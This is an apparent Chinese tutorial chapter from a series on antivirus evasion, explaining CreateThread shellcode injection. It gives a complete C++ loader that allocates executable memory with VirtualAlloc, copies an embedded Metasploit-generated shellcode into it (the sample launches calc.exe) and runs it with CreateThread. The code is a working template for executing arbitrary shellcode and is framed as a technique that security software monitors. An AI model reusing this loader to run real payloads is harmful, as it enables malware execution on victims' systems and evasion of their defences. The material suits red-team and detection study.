# 0-创建线程注入（CreateThread Injection）

## 一、前言

**创建线程注入**是最基础、最经典、最出名的一种注入方式，很多人刚开始学习免杀最先接触的注入方式就是创建线程注入，当然人怕出名猪怕壮，这也是杀软严密监控的一种注入方式。在前面我说过，shellcode的注入大致分为三步：

1. 为shellcode分配内存
2. 将shellcode移动到已分配的内存区域
3. 执行shellcode

**CreateThread**是完成 `执行shellcode` 这一步骤的关键WindowsAPI，所以由此得名 `创建线程注入`。

相信读者很熟悉这种注入方式，因为在 `第一章-基础` 中大部分代码采用的是创建线程注入，因此在本小节中我不会过多说明实现细节，请读者参考前面的文章。

⚠**注意**：从本小节开始，我只用C++完成代码实现，如果有读者想要用C# 和Go实现，那么多注意WindowsAPI的参数类型。

## 二、流程

1. 使用 `VirtualAlloc` 申请一块内存区域。官方文档：[VirtualAlloc 函数 （memoryapi.h） - Win32 apps | Microsoft Learn](https://learn.microsoft.com/zh-cn/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc)
2. 使用 `RtlMoveMemory` 将shellcode移动到相应的内存区域。官方文档：[Wdm.h) (RtlMoveMemory 函数 - Win32 apps | Microsoft Learn](https://learn.microsoft.com/zh-cn/windows/win32/devnotes/rtlmovememory)
3. 使用 `CreateThread` 创建一个线程执行指定位置的代码。官方文档：[CreateThread 函数 （processthreadsapi.h） - Win32 apps | Microsoft Learn](https://learn.microsoft.com/zh-cn/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread)
4. 使用 `WaitForSingleObject` 等待线程完成。官方文档：[WaitForSingleObject 函数 （synchapi.h） - Win32 apps | Microsoft Learn](https://learn.microsoft.com/zh-cn/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)

## 三、代码实现

```go
#include <Windows.h>

//将刚刚在msf中生成的calc的shellcode复制粘贴过来
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50"
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78"
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3"
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d"
"\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb"
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

int main() {

	// 申请一块大小为buf字节数组长度的可读可行的内存区域
	LPVOID pMemory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	// 将buf数组中的内容复制到刚刚分配的内存区域
	RtlMoveMemory(pMemory, buf, sizeof(buf));

	// 创建一个线程执行内存中的代码
	HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pMemory, NULL, 0, NULL);

	// 等待线程执行完成
	WaitForSingleObject(hThread, INFINITE);
}
```

![](https://images-of-oneday.oss-cn-guangzhou.aliyuncs.com/images/2025/01/05/16-23-39-da007886dac86292da108636b76b6157-20250105162338-5e3420.png)